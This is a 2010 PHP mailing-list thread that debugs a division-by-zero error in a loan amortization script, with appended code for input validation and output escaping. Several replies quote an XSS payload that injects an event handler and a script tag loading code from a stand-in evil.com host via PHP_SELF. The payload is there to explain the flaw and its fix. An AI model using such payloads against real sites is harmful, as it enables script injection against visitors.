Re: [PHP] Division by 0
On 3/10/10 11:39 PM, Daniel Egeberg wrote:
> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmi...@ruban.biz> wrote:
>> Hi Jochem,
>>
>> Jochem Maas wrote:
>>> On 3/10/10 6:23 PM, Joseph Thayne wrote:
>>>> Looks to me like you are closing your form before you put anything in it.
>>>> Therefore, the loan_amount is not set making the value 0. Follow the math,
>>>> and you are dividing by 1-1.
>>>>
>>>> Change this line:
>>>>
>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>>
>>>> to:
>>>>
>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>
>>> this is a XSS waiting to happen. I can put something like the following in
>>> the request uri:
>>>
>>> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>>
>> Apparently it's not going to work. PHP_SELF does not include query string.
>> So it is safe to use it this way.
>>
>> Regards,
>> Dmitry
>
> No, it is not safe...
>
> This won't work:
> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>
> But this will:
> index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

yeah sorry, I was lax and made the query string mistake, the issue stands
though as Daniel pointed out.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Division by 0
I love this place, thank you to everyone that posted, I will make changes to
make it safer.

Thanks again to everyone.

gary

"Jochem Maas" <joc...@iamjochem.com> wrote in message
news:4b98de7e.8020...@iamjochem.com...
> On 3/10/10 11:39 PM, Daniel Egeberg wrote:
>> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmi...@ruban.biz> wrote:
>>> Hi Jochem,
>>>
>>> Jochem Maas wrote:
>>>> On 3/10/10 6:23 PM, Joseph Thayne wrote:
>>>>> Looks to me like you are closing your form before you put anything in it.
>>>>> Therefore, the loan_amount is not set making the value 0. Follow the math,
>>>>> and you are dividing by 1-1.
>>>>>
>>>>> Change this line:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>>>
>>>>> to:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>>
>>>> this is a XSS waiting to happen. I can put something like the following in
>>>> the request uri:
>>>>
>>>> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>>>
>>> Apparently it's not going to work. PHP_SELF does not include query string.
>>> So it is safe to use it this way.
>>>
>>> Regards,
>>> Dmitry
>>
>> No, it is not safe...
>>
>> This won't work:
>> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>>
>> But this will:
>> index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>
> yeah sorry, I was lax and made the query string mistake, the issue stands
> though as Daniel pointed out.

__ Information from ESET Smart Security, version of virus signature database 4933 (20100310) __

The message was checked by ESET Smart Security.

http://www.eset.com
RE: [PHP] Division by 0
I have tried and tried, countless times to be removed from this list... still
when I go to my deleted items I can see that emails leak through. If there is
an administrator who can simply delete me (simply because I can not seem to do
this correctly) I would greatly appreciate it.

Thank You!

Sincerely,

Michael Roberts
Executive Recruiter
Corporate Staffing Services
150 Monument Road, Suite 510
Bala Cynwyd, PA 19004
P 610-771-1084
F 610-771-0390
E mrobe...@jobscss.com

Check out my recent feature article in Professional Surveyor 12/09 edition.
http://www.profsurv.com/magazine/article.aspx?i=70379

-----Original Message-----
From: Gary [mailto:gwp...@ptd.net]
Sent: Thursday, March 11, 2010 7:51 AM
To: php-general@lists.php.net
Subject: Re: [PHP] Division by 0

I love this place, thank you to everyone that posted, I will make changes to
make it safer.

Thanks again to everyone.

gary

"Jochem Maas" <joc...@iamjochem.com> wrote in message
news:4b98de7e.8020...@iamjochem.com...
> On 3/10/10 11:39 PM, Daniel Egeberg wrote:
>> On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmi...@ruban.biz> wrote:
>>> Hi Jochem,
>>>
>>> Jochem Maas wrote:
>>>> On 3/10/10 6:23 PM, Joseph Thayne wrote:
>>>>> Looks to me like you are closing your form before you put anything in it.
>>>>> Therefore, the loan_amount is not set making the value 0. Follow the math,
>>>>> and you are dividing by 1-1.
>>>>>
>>>>> Change this line:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>>>
>>>>> to:
>>>>>
>>>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>>>
>>>> this is a XSS waiting to happen. I can put something like the following in
>>>> the request uri:
>>>>
>>>> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>>>
>>> Apparently it's not going to work. PHP_SELF does not include query string.
>>> So it is safe to use it this way.
>>>
>>> Regards,
>>> Dmitry
>>
>> No, it is not safe...
>>
>> This won't work:
>> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>>
>> But this will:
>> index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>
> yeah sorry, I was lax and made the query string mistake, the issue stands
> though as Daniel pointed out.
Re: [PHP] Division by 0
On 3/11/10 2:44 PM, Mike Roberts wrote:
> I have tried and tried, countless times to be removed from this list... still
> when I go to my deleted items I can see that emails leak through. If there is
> an administrator who can simply delete me (simply because I can not seem to do
> this correctly) I would greatly appreciate it.
>
> Thank You!

no there is not (really!), either search the archives, search php.net, look at
the bottom of any of the email sent via the list or check the email headers of
email sent via the list - any one of those will give you a way out.

but that probably is a bit of a technical challenge, so try this:

send a blank email to php-general-unsubscr...@lists.php.net using the email
account you are subscribed to the list with.

all things being equal you should receive a message saying either that you've
been removed or that you need to confirm the removal (which means either
replying once more to that message or clicking a link).

PS - it's generally considered bad form to reply to someone else's thread
rather than send a new message when you're not engaging the current
conversation.
Re: [PHP] Division by 0
On 3/10/10 6:23 PM, Joseph Thayne wrote:
> Looks to me like you are closing your form before you put anything in it.
> Therefore, the loan_amount is not set making the value 0. Follow the math,
> and you are dividing by 1-1.
>
> Change this line:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>
> to:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

this is a XSS waiting to happen. I can put something like the following in
the request uri:

index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

with regard to the original problem - some input validation is in order.

    (pow($intCalc,$totalPayments) - 1);

if $intCalc and $totalPayments are both equal to 1 then either something is
wrong and the calc shouldn't be done or some other calc needs to be done.

every value being POSTed should be checked that it's been set, and that it's a
valid numeric value (for the numeric fields) ... if anything is missing show
the form again and display an error message without doing the calculation.

> and you should be good to go.
>
> Joseph
>
> Gary wrote:
>> I have a mortgage amortization script that was working fine, now it seems to
>> have gone awry. Below is the entire script plus input page. I am getting an
>> error
>>
>> Warning: Division by zero in
>> /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on line 47
>>
>> Which is
>>
>> (pow($intCalc,$totalPayments) - 1);
>>
>> Frankly I am not even sure the information is being passed to the script.
>>
>> Anyone see what I am missing?
>>
>> Gary
>>
>> <div id="onecol">Calculate your Loan</div>
>> <div id="leftcontent">
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>> <table>
>> <tr>
>> <td style="background-color:#B1D8D8" width="110px">Loan Amount</td>
>> <td><input name="loan_amount" type="text" size="25" /> USD</td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the amount of money to be loaned.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder"/></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="110px">Type of Loan</td>
>> <td>
>> <select name="type" size="1" id="type">
>> <option>Installment</option>
>> <option>Balloon</option>
>> </select></td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the method of repayment.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder"/></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="100px">Term of Loan</td>
>> <td><input name="loan_term" type="text" size="5" /> </select>Months</td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the amount of time that the money is loaned for.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder" /></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="140px">Interest Rate</td>
>> <td><input name="int_rate" type="text" size="10" /> Per Annum</td><td><a href="javascript:void(0);" onmouseover="Tip('Percentage (%) charged on loan on an annual basis. <br />Please see our FAQs for information on usury rates. <br />If no amount is entered this will be 0%.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder" /></a></td>
>> </tr>
>> </table>
>> <label>
>> <input type="submit" name="submit" id="submit" value="submit" />
>> </label>
>> </form>
>> <?php
>> function amortizationTable($paymentNum, $periodicPayment, $balance, $monthlyInterest) {
>>     $paymentInterest = round($balance * $monthlyInterest,2);
>>     $paymentPrincipal = round($periodicPayment - $paymentInterest,2);
>>     $newBalance = round($balance - $paymentPrincipal,2);
>>     print "<tr>
>>     <td>$paymentNum</td>
>>     <td>\$".number_format($balance,2)."</td>
>>     <td>\$".number_format($periodicPayment,2)."</td>
>>     <td>\$".number_format($paymentInterest,2)."</td>
>>     <td>\$".number_format($paymentPrincipal,2)."</td>
>>     </tr>";
>>     # If balance not yet zero, recursively call amortizationTable()
>>     if ($newBalance > 0) {
>>         $paymentNum++;
>>         amortizationTable($paymentNum, $periodicPayment, $newBalance, $monthlyInterest);
>>     } else {
>>         exit;
>>     }
>> } #end amortizationTable()
>>
>> # Loan balance
>> $balance =($_POST['loan_amount']);
>> # Loan interest rate
>> $interestRate = ($_POST['int_rate']);
>> # Monthly interest rate
>> $monthlyInterest = ($interestRate / 12);
>> # Term length of the loan, in years.
>> $termLength =($_POST['loan_term']);
>> # Number of payments per year.
>> $paymentsPerYear = 12;
>> # Payment iteration
>> $paymentNumber =($_POST['loan_term']);
>> # Perform preliminary calculations
>> $totalPayments = $termLength * $paymentsPerYear;
>> $intCalc = 1 + $interestRate / $paymentsPerYear;
>> $periodicPayment = $balance * pow($intCalc,$totalPayments) * ($intCalc - 1) / (pow($intCalc,$totalPayments) - 1);
>> $periodicPayment = round($periodicPayment,2);
>> # Create table
>> echo "<table width='50%' align='center' border='1'>";
>> print "<tr>
>> <th>Payment Number</th><th>Balance</th>
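Jochem's advice above (check every POSTed field is set and numeric, and don't run the annuity formula when its denominator is 1 - 1) worked through as an added example. This is not code from the thread or from Gary's script; the function names are mine, the sample inputs are constructed, and it assumes int_rate is entered as a percentage per annum and loan_term in months, as the form labels it. The zero-rate case is the one the original formula cannot handle, so it is branched explicitly rather than left to divide by zero.

```php
<?php
// Added example (not code from the thread): validate the POSTed loan fields
// before computing anything, and handle the zero-interest case explicitly so
// the annuity formula never divides by zero.
//
// Assumptions (mine, not stated in the thread): int_rate is a percentage per
// annum (e.g. "6.5"), loan_term is a whole number of months, loan_amount is in
// currency units.

declare(strict_types=1);

// Returns a list of error messages; an empty list means the input is acceptable.
function validateLoanInput(array $post): array
{
    $errors = [];
    foreach (['loan_amount', 'int_rate', 'loan_term'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field]) || trim($post[$field]) === '') {
            $errors[] = "$field is missing";
        } elseif (!is_numeric($post[$field])) {
            $errors[] = "$field must be a number";
        }
    }
    if ($errors !== []) {
        return $errors;                 // range checks below assume numeric strings
    }
    if ((float) $post['loan_amount'] <= 0) {
        $errors[] = 'loan_amount must be greater than zero';
    }
    if ((float) $post['int_rate'] < 0 || (float) $post['int_rate'] > 100) {
        $errors[] = 'int_rate must be between 0 and 100 percent';
    }
    $termOk = filter_var($post['loan_term'], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 600]]);
    if ($termOk === false) {
        $errors[] = 'loan_term must be a whole number of months between 1 and 600';
    }
    return $errors;
}

// Monthly payment for a fully amortising loan. At a zero rate the annuity
// denominator (growth - 1) is zero, so the payment is principal / months.
function periodicPayment(float $principal, float $annualRatePercent, int $months): float
{
    $monthlyRate = $annualRatePercent / 100 / 12;
    if ($monthlyRate == 0.0) {
        return round($principal / $months, 2);
    }
    $growth = pow(1 + $monthlyRate, $months);
    return round($principal * $growth * $monthlyRate / ($growth - 1), 2);
}

// Builds the schedule iteratively (no recursion, no exit()).
// Each row: [paymentNumber, openingBalance, payment, interest, principal].
function amortizationSchedule(float $principal, float $annualRatePercent, int $months): array
{
    $payment = periodicPayment($principal, $annualRatePercent, $months);
    $monthlyRate = $annualRatePercent / 100 / 12;
    $rows = [];
    $balance = $principal;
    for ($n = 1; $n <= $months && $balance > 0; $n++) {
        $interest = round($balance * $monthlyRate, 2);
        // The final payment only clears what is left, absorbing rounding residue.
        $toPrincipal = min(round($payment - $interest, 2), $balance);
        $rows[] = [$n, $balance, round($interest + $toPrincipal, 2), $interest, $toPrincipal];
        $balance = round($balance - $toPrincipal, 2);
    }
    return $rows;
}

// Constructed sample submissions standing in for $_POST: a normal loan, a
// zero-rate loan, and the empty submission the mis-closed form produced.
$samples = [
    ['loan_amount' => '10000', 'int_rate' => '6', 'loan_term' => '12'],
    ['loan_amount' => '10000', 'int_rate' => '0', 'loan_term' => '4'],
    [],
];

foreach ($samples as $post) {
    $errors = validateLoanInput($post);
    if ($errors !== []) {
        // In the real page: re-display the form with these messages and skip the maths.
        echo 'Input rejected: ' . implode('; ', $errors) . "\n";
        continue;
    }
    $rows = amortizationSchedule((float) $post['loan_amount'], (float) $post['int_rate'], (int) $post['loan_term']);
    printf("Payment %s per month over %d months, %d rows\n",
        number_format($rows[0][2], 2), (int) $post['loan_term'], count($rows));
}
```

Run with `php` on the command line; the first sample prints a payment of 860.66, the second 2,500.00, and the empty submission is rejected before any arithmetic runs. The script's own fix (closing the form in the right place) still matters, but with this check in front of the calculation a stray empty POST produces an error message instead of a warning.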
Re: [PHP] Division by 0
Joseph

My apologies for not writing sooner to thank you, you were of course correct.

Thanks again.

Gary

"Joseph Thayne" <webad...@thaynefam.org> wrote in message
news:4b97e3a2.2030...@thaynefam.org...
> Looks to me like you are closing your form before you put anything in it.
> Therefore, the loan_amount is not set making the value 0. Follow the math,
> and you are dividing by 1-1.
>
> Change this line:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>
> to:
>
> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>
> and you should be good to go.
>
> Joseph
>
> Gary wrote:
>> I have a mortgage amortization script that was working fine, now it seems to
>> have gone awry. Below is the entire script plus input page. I am getting an
>> error
>>
>> Warning: Division by zero in
>> /home/content/J/a/y/Jayski/html/one2one/Ricksrecursivefunctions.php on line 47
>>
>> Which is
>>
>> (pow($intCalc,$totalPayments) - 1);
>>
>> Frankly I am not even sure the information is being passed to the script.
>>
>> Anyone see what I am missing?
>>
>> Gary
>>
>> <div id="onecol">Calculate your Loan</div>
>> <div id="leftcontent">
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>> <table>
>> <tr>
>> <td style="background-color:#B1D8D8" width="110px">Loan Amount</td>
>> <td><input name="loan_amount" type="text" size="25" /> USD</td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the amount of money to be loaned.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder"/></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="110px">Type of Loan</td>
>> <td>
>> <select name="type" size="1" id="type">
>> <option>Installment</option>
>> <option>Balloon</option>
>> </select></td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the method of repayment.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder"/></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="100px">Term of Loan</td>
>> <td><input name="loan_term" type="text" size="5" /> </select>Months</td>
>> <td><a href="javascript:void(0);" onmouseover="Tip('This is the amount of time that the money is loaned for.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder" /></a></td>
>> </tr>
>> <tr>
>> <td style="background-color:#B1D8D8" width="140px">Interest Rate</td>
>> <td><input name="int_rate" type="text" size="10" /> Per Annum</td><td><a href="javascript:void(0);" onmouseover="Tip('Percentage (%) charged on loan on an annual basis. <br />Please see our FAQs for information on usury rates. <br />If no amount is entered this will be 0%.')" onmouseout="UnTip()"><img src="images/help.png" class="noborder" /></a></td>
>> </tr>
>> </table>
>> <label>
>> <input type="submit" name="submit" id="submit" value="submit" />
>> </label>
>> </form>
>> <?php
>> function amortizationTable($paymentNum, $periodicPayment, $balance, $monthlyInterest) {
>>     $paymentInterest = round($balance * $monthlyInterest,2);
>>     $paymentPrincipal = round($periodicPayment - $paymentInterest,2);
>>     $newBalance = round($balance - $paymentPrincipal,2);
>>     print "<tr>
>>     <td>$paymentNum</td>
>>     <td>\$".number_format($balance,2)."</td>
>>     <td>\$".number_format($periodicPayment,2)."</td>
>>     <td>\$".number_format($paymentInterest,2)."</td>
>>     <td>\$".number_format($paymentPrincipal,2)."</td>
>>     </tr>";
>>     # If balance not yet zero, recursively call amortizationTable()
>>     if ($newBalance > 0) {
>>         $paymentNum++;
>>         amortizationTable($paymentNum, $periodicPayment, $newBalance, $monthlyInterest);
>>     } else {
>>         exit;
>>     }
>> } #end amortizationTable()
>>
>> # Loan balance
>> $balance =($_POST['loan_amount']);
>> # Loan interest rate
>> $interestRate = ($_POST['int_rate']);
>> # Monthly interest rate
>> $monthlyInterest = ($interestRate / 12);
>> # Term length of the loan, in years.
>> $termLength =($_POST['loan_term']);
>> # Number of payments per year.
>> $paymentsPerYear = 12;
>> # Payment iteration
>> $paymentNumber =($_POST['loan_term']);
>> # Perform preliminary calculations
>> $totalPayments = $termLength * $paymentsPerYear;
>> $intCalc = 1 + $interestRate / $paymentsPerYear;
>> $periodicPayment = $balance * pow($intCalc,$totalPayments) * ($intCalc - 1) / (pow($intCalc,$totalPayments) - 1);
>> $periodicPayment = round($periodicPayment,2);
>> # Create table
>> echo "<table width='50%' align='center' border='1'>";
>> print "<tr>
>> <th>Payment Number</th><th>Balance</th>
>> <th>Payment</th><th>Interest</th><th>Principal</th>
>> </tr>";
>> # Call recursive function
>> amortizationTable($paymentNumber, $periodicPayment, $balance, $monthlyInterest);
>> # Close table
>> print "</table>";
>> ?>
>> </div>
Re: [PHP] Division by 0
On Wed, Mar 10, 2010 at 22:27, Jochem Maas <joc...@iamjochem.com> wrote:
> On 3/10/10 6:23 PM, Joseph Thayne wrote:
>> Looks to me like you are closing your form before you put anything in it.
>> Therefore, the loan_amount is not set making the value 0. Follow the math,
>> and you are dividing by 1-1.
>>
>> Change this line:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>
>> to:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>
> this is a XSS waiting to happen. I can put something like the following in
> the request uri:
>
> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>
> with regard to the original problem - some input validation is in order.

PHP_SELF doesn't contain the query string, so your particular attack wouldn't
work. It's still a security issue though.

-- 
Daniel Egeberg
Re: [PHP] Division by 0
Hi Jochem,

Jochem Maas wrote:
> On 3/10/10 6:23 PM, Joseph Thayne wrote:
>> Looks to me like you are closing your form before you put anything in it.
>> Therefore, the loan_amount is not set making the value 0. Follow the math,
>> and you are dividing by 1-1.
>>
>> Change this line:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>
>> to:
>>
>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>
> this is a XSS waiting to happen. I can put something like the following in
> the request uri:
>
> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

Apparently it's not going to work. PHP_SELF does not include query string.
So it is safe to use it this way.

Regards,
Dmitry
Re: [PHP] Division by 0
On Wed, Mar 10, 2010 at 23:44, Dmitry Ruban <dmi...@ruban.biz> wrote:
> Hi Jochem,
>
> Jochem Maas wrote:
>> On 3/10/10 6:23 PM, Joseph Thayne wrote:
>>> Looks to me like you are closing your form before you put anything in it.
>>> Therefore, the loan_amount is not set making the value 0. Follow the math,
>>> and you are dividing by 1-1.
>>>
>>> Change this line:
>>>
>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
>>>
>>> to:
>>>
>>> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
>>
>> this is a XSS waiting to happen. I can put something like the following in
>> the request uri:
>>
>> index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
>
> Apparently it's not going to work. PHP_SELF does not include query string.
> So it is safe to use it this way.
>
> Regards,
> Dmitry

No, it is not safe...

This won't work:
index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

But this will:
index.php/" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>

-- 
Daniel Egeberg
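Daniel's point above, that PHP_SELF carries the request's PATH_INFO suffix, is what makes `echo $_SERVER['PHP_SELF']` inside an attribute unsafe, and the fix is to escape for the attribute context (or not reflect the URL at all). The following is an added example, not code from the thread: the function names are mine, the PHP_SELF values are constructed stand-ins for `$_SERVER['PHP_SELF']`, and the check at the end only tests whether the attribute value stayed a single quoted token.

```php
<?php
// Added example (not code from the thread). PHP_SELF includes PATH_INFO, so a
// request for /index.php/<suffix> puts <suffix> into the form's action
// attribute. Shown here: the raw pattern from the thread, the escaped form,
// and an alternative that does not reflect the URL at all.

declare(strict_types=1);

// The pattern used in the thread: the raw value lands inside a quoted attribute.
function formActionUnsafe(string $phpSelf): string
{
    return '<form action="' . $phpSelf . '" method="post">';
}

// Hardened: escape for an HTML attribute context. ENT_QUOTES covers both quote
// styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function formActionEscaped(string $phpSelf): string
{
    $safe = htmlspecialchars($phpSelf, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $safe . '" method="post">';
}

// Alternative that reflects nothing: with no action attribute an HTML5 form
// submits to the document's own URL.
function formActionSelfPosting(): string
{
    return '<form method="post">';
}

// True if the markup is still one <form> tag whose action is a single quoted
// token containing no quote or angle bracket, i.e. the attribute was not
// broken out of. (A structural check for this example, not an XSS detector.)
function actionAttributeIntact(string $html): bool
{
    return preg_match('/^<form action="([^"<>]*)" method="post">$/', $html) === 1;
}

// Constructed request values standing in for $_SERVER['PHP_SELF']: a plain
// request, and one whose PATH_INFO suffix contains a quote and a tag, the same
// shape as the request discussed in the thread.
$samples = [
    '/index.php',
    '/index.php/" onsubmit="x()"><b>',
];

foreach ($samples as $phpSelf) {
    $unsafe  = formActionUnsafe($phpSelf);
    $escaped = formActionEscaped($phpSelf);
    printf("PHP_SELF=%s\n  raw    : %s  intact=%s\n  escaped: %s  intact=%s\n",
        $phpSelf,
        $unsafe,  actionAttributeIntact($unsafe)  ? 'yes' : 'NO',
        $escaped, actionAttributeIntact($escaped) ? 'yes' : 'NO');
}
echo 'no reflection: ' . formActionSelfPosting() . "\n";
```

For the second sample the raw form fails the check (the quote in PATH_INFO closes the attribute early), while the escaped form renders the suffix as `&quot;`, `&lt;` and `&gt;` and the attribute stays intact. Escaping at output is the general rule; dropping the action attribute is the simpler fix when the form only ever posts back to itself.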